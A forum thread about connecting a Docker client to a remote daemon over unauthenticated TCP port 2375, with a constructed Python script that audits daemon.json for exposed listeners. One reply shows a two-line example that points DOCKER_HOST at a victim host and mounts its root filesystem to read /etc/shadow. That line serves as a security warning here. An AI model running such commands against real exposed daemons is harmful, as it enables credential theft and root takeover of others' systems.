Newbie Question re: Docker Networking

I’m doing some self-paced training on Docker and in an early lesson, the instructor shows how you configure the Docker daemon to listen on Port 2375 over a network. Let’s call this “Docker Host 1”. I can see that after configuring the Docker config files and restarting the Daemon, “Docker Host 1” is listening over port 2375 on the IP address of the host Ubuntu server.

The instructor then tries to have us demonstrate how you can connect to that port remotely from a second Docker host we will call “Docker Host 2”, by setting the “DOCKER_HOST” environment variable to tcp://<ip of Docker Host 1>:2375. Then, he says, when you run simple docker client commands from “Docker Host 2”, the results come from the Docker daemon on “Docker Host 1”. (Commands like “docker -v”, “docker version” and “docker info”.) In his demo, when you run these commands from “Docker Host 2”, the info is clearly coming from “Docker Host 1” which is running a slightly different version of Docker Engine. This is meant to demonstrate that a Docker client can execute commands locally, or over a network.

The problem for me is that this is not how it is working. All of the simple docker client commands I run are clearly returning data from Docker Host 2.

I’ve done some basic network connectivity checks between the two hosts. I can ping the host IP addresses in both directions, I can telnet from Host 2 to Host 1 over Port 2375 to verify no firewalls. I even configured “Host 1” client to connect to itself over tcp as opposed to the local socket (default). The only thing that fails is trying to use commands on Host 2 to get responses from Host 1.

This all sounds kind of trivial (maybe), but I’m concerned that I may be missing some key aspect of the Docker networking stack that will bite me later in the training when I try to perform more complex and useful tasks.

NOTE: Docker Host 1 is running Ubuntu v 16.04; this host is running Docker Engine: 1.10.3
Docker Host 2 is running CentOS 7 and running Docker Engine 1.11.2

Oh dear.

Or, for instance,

export DOCKER_HOST=tcp://unwitting-victim.example.com:2375/
docker run --rm -v /:/host ubuntu:16.04 cat /host/etc/shadow

if you want to steal the host’s password file…as one of the most benign things it’s possible to do with unrestricted network-visible root access to the system.

I wouldn’t try to go especially far down this path. ssh to the other host system to run containers there.

(Do you actually have the variable exported? Does env | grep DOCKER show it?)
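
A configuration check for the exposure described in the reply above, added here as an example and not part of anyone's post: it reads a daemon.json and reports TCP listeners that accept clients without certificate authentication. The function name and the sample configurations are constructed for illustration; hosts, tls and tlsverify are dockerd's own daemon.json keys.

```python
import json

# Constructed sample configurations (not taken from the thread).
EXPOSED = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
TLS_ONLY = '{"hosts": ["tcp://0.0.0.0:2376"], "tls": true}'
HARDENED = ('{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"], '
            '"tlsverify": true, "tlscacert": "/etc/docker/ca.pem", '
            '"tlscert": "/etc/docker/server-cert.pem", '
            '"tlskey": "/etc/docker/server-key.pem"}')

LOOPBACK_PREFIXES = ("127.", "localhost", "[::1]")


def audit_daemon_json(text):
    """Return (listener, severity, reason) for each TCP listener that
    accepts clients without certificate authentication."""
    cfg = json.loads(text)
    if cfg.get("tlsverify") is True:
        return []  # daemon only accepts clients with a CA-signed certificate
    if cfg.get("tls") is True:
        reason = "TLS without tlsverify: encrypted, but any client is accepted"
    else:
        reason = "no TLS: plaintext API, any client is accepted"
    findings = []
    for listener in cfg.get("hosts", []):
        if not listener.startswith("tcp://"):
            continue  # unix:// and fd:// are controlled by local permissions
        address = listener[len("tcp://"):]
        # Loopback still exposes the API to every local process, so it is
        # reported, at lower severity than a network-reachable listener.
        severity = "medium" if address.startswith(LOOPBACK_PREFIXES) else "high"
        findings.append((listener, severity, reason))
    return findings


if __name__ == "__main__":
    for name, sample in (("exposed", EXPOSED), ("tls-only", TLS_ONLY),
                         ("hardened", HARDENED)):
        print(name, audit_daemon_json(sample) or "no unauthenticated TCP listener")
```

Listeners and TLS options passed as flags on the dockerd command line (for example in a systemd unit) do not appear in daemon.json and need the same check.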

Thanks. I understand that the instructor’s use case isn’t best practice, and he stated so when describing how to set it up. It’s just a demonstration for training. If this is not how container host to host communications is typically done, I’m not going to worry too much about it. It just seemed like a basic config and if it wasn’t working, I might find myself stopped in my tracks later in the course.

Thanks.